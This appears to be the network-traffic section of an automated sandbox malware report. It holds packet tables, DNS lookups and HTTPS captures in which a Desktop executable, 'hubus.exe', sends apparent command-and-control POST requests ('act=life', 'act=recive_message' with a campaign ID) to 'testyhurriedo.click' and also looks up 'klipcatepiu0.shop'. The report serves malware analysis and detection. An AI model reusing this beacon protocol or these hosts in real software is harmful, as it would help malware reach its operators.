                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.282460928 CET44349751172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.282742977 CET49751443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.282752037 CET44349751172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.283477068 CET44349751172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.283823967 CET49751443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.283937931 CET49751443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.283996105 CET49751443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.284024954 CET44349751172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.314827919 CET49750443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.330545902 CET49751443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.330554962 CET44349751172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.378190994 CET49751443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.426902056 CET44349749172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.426970005 CET44349749172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.427213907 CET49749443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.427901983 CET49749443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.427910089 CET44349749172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.429907084 CET49753443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.429923058 CET44349753172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.430170059 CET49753443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.430548906 CET49753443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.430557966 CET44349753172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.498790979 CET44349752172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.499191999 CET49752443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.499201059 CET44349752172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.499897957 CET44349752172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.500076056 CET49752443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.500394106 CET49752443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.500442028 CET44349752172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.500550032 CET49752443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.546205997 CET44349752172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.550028086 CET49752443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.550036907 CET44349752172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.597609043 CET49752443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.789616108 CET44349752172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.789647102 CET44349752172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.789839029 CET44349752172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.789849043 CET49752443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.789875984 CET44349752172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.790041924 CET49752443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.790071011 CET44349752172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.790286064 CET49752443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.790422916 CET49752443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.790432930 CET44349752172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.791975975 CET44349750172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.792237997 CET44349750172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.792479038 CET49750443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.792526960 CET49750443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.792536020 CET44349750172.253.124.104192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.792546034 CET49750443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.792701960 CET49750443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:36.052949905 CET49761443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:36.053030014 CET49761443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:36.053036928 CET44349761104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:36.065032959 CET49762443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:36.065053940 CET44349762104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:36.065201044 CET49762443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:36.065462112 CET49762443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:36.065474987 CET44349762104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:36.342283010 CET44349762104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:36.342508078 CET49762443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:36.343475103 CET49762443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:36.343493938 CET44349762104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:36.343861103 CET44349762104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:36.344907045 CET49762443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:36.345045090 CET49762443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:36.345067978 CET49762443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:36.345107079 CET44349762104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:36.345115900 CET49762443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:36.345133066 CET44349762104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:36.898124933 CET49757443192.168.11.20172.253.124.104
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:36.979125023 CET44349762104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:36.979250908 CET44349762104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:36.979585886 CET49762443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:36.979767084 CET49762443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:36.979794979 CET44349762104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:37.030769110 CET49763443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:37.030818939 CET44349763104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:37.031076908 CET49763443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:37.031271935 CET49763443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:37.031303883 CET44349763104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:37.318521023 CET44349763104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:37.318728924 CET49763443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:37.319603920 CET49763443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:37.319648027 CET44349763104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:37.320597887 CET44349763104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:37.321640015 CET49763443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:37.321816921 CET49763443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:37.321870089 CET49763443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:37.321897984 CET44349763104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:37.321928024 CET49763443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:37.321959019 CET44349763104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:37.322102070 CET49763443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:37.322335005 CET49763443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:37.322472095 CET44349763104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:37.912978888 CET44349763104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:37.913288116 CET44349763104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:37.913521051 CET49763443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:37.913722992 CET49763443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:37.913778067 CET44349763104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:37.999034882 CET49764443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:37.999078989 CET44349764104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:37.999289989 CET49764443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:37.999505997 CET49764443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:37.999528885 CET44349764104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:38.278151989 CET44349764104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:38.278409958 CET49764443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:38.279268980 CET49764443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:38.279279947 CET44349764104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:38.279475927 CET44349764104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:38.280735970 CET49764443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:38.280750036 CET49764443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:38.280791998 CET44349764104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:38.815018892 CET44349764104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:38.815382957 CET44349764104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:38.815589905 CET49764443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:38.815817118 CET49764443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:38.815861940 CET44349764104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:39.239645004 CET49765443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:39.239715099 CET44349765104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:39.239891052 CET49765443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:39.240147114 CET49765443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:39.240191936 CET44349765104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:39.539339066 CET44349765104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:39.539585114 CET49765443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:39.540483952 CET49765443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:39.540523052 CET44349765104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:39.541300058 CET44349765104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:39.542407036 CET49765443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:39.543687105 CET49765443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:39.543752909 CET49765443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:39.543781996 CET49765443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:39.543822050 CET44349765104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:39.544115067 CET49765443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:39.544153929 CET44349765104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:39.544291019 CET49765443192.168.11.20104.21.112.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:39.544358015 CET44349765104.21.112.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:59:36.132961988 CET4974380192.168.11.20173.194.219.94
                                                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                            Dec 20, 2024 00:57:59.071805000 CET137137192.168.11.20192.168.11.255
                                                                                                                                                                                                                                                            Dec 20, 2024 00:57:59.822175980 CET137137192.168.11.20192.168.11.255
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:00.587579966 CET137137192.168.11.20192.168.11.255
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:05.869985104 CET137137192.168.11.20192.168.11.255
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:06.626003981 CET137137192.168.11.20192.168.11.255
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:07.391539097 CET137137192.168.11.20192.168.11.255
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:23.644306898 CET6063653192.168.11.201.1.1.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:23.814704895 CET53606361.1.1.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.134309053 CET53527701.1.1.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.150954962 CET557731900192.168.11.20239.255.255.250
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.188277006 CET53557721.1.1.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.223495007 CET5581453192.168.11.201.1.1.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.223579884 CET5496053192.168.11.201.1.1.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.359985113 CET53549601.1.1.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:28.365010977 CET53558141.1.1.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.132028103 CET53630141.1.1.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:29.159733057 CET557731900192.168.11.20239.255.255.250
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:30.164916039 CET557731900192.168.11.20239.255.255.250
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:31.177436113 CET557731900192.168.11.20239.255.255.250
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:31.749910116 CET53533501.1.1.1192.168.11.20
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:42.934640884 CET5538153192.168.11.201.1.1.1
                                                                                                                                                                                                                                                            Dec 20, 2024 00:58:43.093311071 CET53553811.1.1.1192.168.11.20
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 20, 2024 00:58:23.644306898 CET | 192.168.11.20 | 1.1.1.1 | 0xacee | Standard query (0) | testyhurriedo.click | A (IP address) | IN (0x0001) | false
Dec 20, 2024 00:58:28.223495007 CET | 192.168.11.20 | 1.1.1.1 | 0xffb | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
Dec 20, 2024 00:58:28.223579884 CET | 192.168.11.20 | 1.1.1.1 | 0xe4a6 | Standard query (0) | www.google.com | 65 | IN (0x0001) | false
Dec 20, 2024 00:58:42.934640884 CET | 192.168.11.20 | 1.1.1.1 | 0x713 | Standard query (0) | klipcatepiu0.shop | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 20, 2024 00:58:23.814704895 CET | 1.1.1.1 | 192.168.11.20 | 0xacee | No error (0) | testyhurriedo.click |  | 104.21.112.1 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 00:58:23.814704895 CET | 1.1.1.1 | 192.168.11.20 | 0xacee | No error (0) | testyhurriedo.click |  | 104.21.64.1 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 00:58:23.814704895 CET | 1.1.1.1 | 192.168.11.20 | 0xacee | No error (0) | testyhurriedo.click |  | 104.21.96.1 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 00:58:23.814704895 CET | 1.1.1.1 | 192.168.11.20 | 0xacee | No error (0) | testyhurriedo.click |  | 104.21.16.1 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 00:58:23.814704895 CET | 1.1.1.1 | 192.168.11.20 | 0xacee | No error (0) | testyhurriedo.click |  | 104.21.32.1 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 00:58:23.814704895 CET | 1.1.1.1 | 192.168.11.20 | 0xacee | No error (0) | testyhurriedo.click |  | 104.21.48.1 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 00:58:23.814704895 CET | 1.1.1.1 | 192.168.11.20 | 0xacee | No error (0) | testyhurriedo.click |  | 104.21.80.1 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 00:58:28.359985113 CET | 1.1.1.1 | 192.168.11.20 | 0xe4a6 | No error (0) | www.google.com |  |  | 65 | IN (0x0001) | false
Dec 20, 2024 00:58:28.365010977 CET | 1.1.1.1 | 192.168.11.20 | 0xffb | No error (0) | www.google.com |  | 172.253.124.104 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 00:58:28.365010977 CET | 1.1.1.1 | 192.168.11.20 | 0xffb | No error (0) | www.google.com |  | 172.253.124.103 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 00:58:28.365010977 CET | 1.1.1.1 | 192.168.11.20 | 0xffb | No error (0) | www.google.com |  | 172.253.124.99 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 00:58:28.365010977 CET | 1.1.1.1 | 192.168.11.20 | 0xffb | No error (0) | www.google.com |  | 172.253.124.105 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 00:58:28.365010977 CET | 1.1.1.1 | 192.168.11.20 | 0xffb | No error (0) | www.google.com |  | 172.253.124.147 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 00:58:28.365010977 CET | 1.1.1.1 | 192.168.11.20 | 0xffb | No error (0) | www.google.com |  | 172.253.124.106 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 00:58:43.093311071 CET | 1.1.1.1 | 192.168.11.20 | 0x713 | Name error (3) | klipcatepiu0.shop | none | none | A (IP address) | IN (0x0001) | false
                                                                                                                                                                                                                                                            • testyhurriedo.click
                                                                                                                                                                                                                                                            • www.google.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.11.20 | 49744 | 104.21.112.1 | 443 | 4780 | C:\Users\user\Desktop\hubus.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 23:58:24 UTC | 266 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 8
                                                                                                                                                                                                                                                            Host: testyhurriedo.click
2024-12-19 23:58:24 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                            Data Ascii: act=life
2024-12-19 23:58:24 UTC | 1135 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Thu, 19 Dec 2024 23:58:24 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=8k3pl8uldl92e6gdehhvg326ce; expires=Mon, 14 Apr 2025 17:45:03 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o1V%2BfO0EIpmo3lc0%2FuU2brPn5N7pSzMISDBJ6RpK811JqB3Z%2BOMsvTY8H%2BZxnrbXSvhfiRnQnOeVP9ifjr%2BQ0cDL%2FTVesn82fR9dWu8WOp9pcGgiMwNfdSAaDqmW9tZghSvTmWoS"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8f4b572a2b3432ef-JAX
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=134997&min_rtt=134857&rtt_var=28562&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=910&delivery_rate=28395&cwnd=252&unsent_bytes=0&cid=44c22b2db849b695&ts=666&x=0"
2024-12-19 23:58:24 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 2ok
2024-12-19 23:58:24 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.11.20 | 49745 | 104.21.112.1 | 443 | 4780 | C:\Users\user\Desktop\hubus.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 23:58:25 UTC | 267 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 48
                                                                                                                                                                                                                                                            Host: testyhurriedo.click
2024-12-19 23:58:25 UTC | 48 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 6a 4d 77 31 49 45 2d 2d 53 48 45 4c 4c 53 26 6a 3d
                                                                                                                                                                                                                                                            Data Ascii: act=recive_message&ver=4.0&lid=jMw1IE--SHELLS&j=
2024-12-19 23:58:25 UTC | 1137 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Thu, 19 Dec 2024 23:58:25 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=dlq2pcao0r1cr1hb8mn1ijmm2r; expires=Mon, 14 Apr 2025 17:45:04 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kqD02Roz9G4LWQOT0lq3FPJMkze%2FPrW%2BOl1dC8PNxZCgLwRzkRIaK4zJ%2F%2BH0oZjFWWT%2BY3lMfXicjdU140ZtoZHZ%2BiDFSFQWFTvIGsvb2oGSMJkeUunQgtXh76sXmUjUb%2FiVKLdq"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8f4b57301def32f5-JAX
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=135086&min_rtt=135004&rtt_var=28614&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2847&recv_bytes=951&delivery_rate=28307&cwnd=252&unsent_bytes=0&cid=fccf8b26ead3a930&ts=730&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.11.20 | 49749 | 172.253.124.104 | 443 | 6932 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 23:58:28 UTC | 807 | OUT | GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            X-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIlKHLAQic/swBCIWgzQEIrJ7OAQjkr84BCMO2zgEIvbnOAQjtvM4BCLu9zgEI1r3OAQjMv84BGMHLzAEYva7OARidsc4B
                                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
